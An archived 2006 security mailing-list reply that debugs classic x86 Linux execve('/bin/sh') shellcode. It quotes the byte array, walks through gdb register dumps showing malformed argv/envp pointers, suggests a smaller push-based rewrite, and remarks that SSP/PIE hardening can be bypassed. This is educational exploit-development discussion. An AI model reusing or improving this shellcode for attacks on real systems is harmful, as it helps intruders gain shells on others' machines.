From: Justin Ferguson (jnferguson@gmail.com)
Date: Mon Jun 19 2006 - 21:25:38 EDT
Hi Paul,
> -------------------------------------------------------------------------------
> char main[] =
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> -------------------------------------------------------------------------------
First let me suggest naming your array something else, I don't think
your C code compiled unless you renamed main() and linked it yourself
(i.e. ld -e). It's a sidepoint though, name it something else, sc[] or
whatever.
What I see is that just before you call int 0x80, you have 11/0x0b in
the eax register (correct), a pointer to the string '/bin/sh' in the
ebx register (correct), a pointer to a pointer to char, however this
array is supposed to be null terminated and your is not, and finally
in the edx register you have a pointer to null.
(gdb) p $rax
$3 = 11
(gdb) x/s $rbx
0x5008a6 <sc+38>: "/bin/sh"
(gdb) x/wx *$rcx
0x5008a6 <sc+38>: 0x6e69622f
(gdb)
0x5008aa <sc+42>: 0x0068732f
(gdb)
0x5008ae <sc+46>: 0x005008a6
(gdb) x/wx *$rdx
0x0: Cannot access memory at address 0x0
(gdb) x/wx $rdx
0x5008b2 <completed.1+2>: 0x00000000
Please look at the prototype for execve(2), and read the manpage.
int execve(const char *filename, char *const argv [], char *const envp[]);
'Both argv and envp must be terminated by a null pointer.'
So, your **argv is broken as its not terminated by a NULL pointer, and
your **envp is broken because it is a NULL pointer. As to why it
works, I've noticed through my experience that some implementations
don't mind envp being NULL, while others shit the bed on you, so its
best to just set one up.
Aleph1's shellcode is great for learning how the stack operates, but
aside from that its clunky and large, you should consider rewritting
it using the stack and a series of push's/mov's as it results in a
smaller shellcode and gives you what you want.
> I also tested it on my gentoo-box with ssp and pie.
> Here it is impossible to actually smash the stack, however the shellcode
> itself works.
Nothing is impossible, SSP/PIE/hardened gentoo in general makes it
improbable, but not impossible, the flaws in all of the hardening
tools have been well documented in phrack and such.
------------------------------------------------------------------------------
This List Sponsored by: Cenzic
Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
Choice Award from eWeek. As attacks through web applications continue to rise,
you need to proactively protect your applications from hackers. Cenzic has the
most comprehensive solutions to meet your application security penetration
testing and vulnerability management needs. You have an option to go with a
managed service (Cenzic ClickToSecure) or an enterprise software
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
help you: http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:08 EDT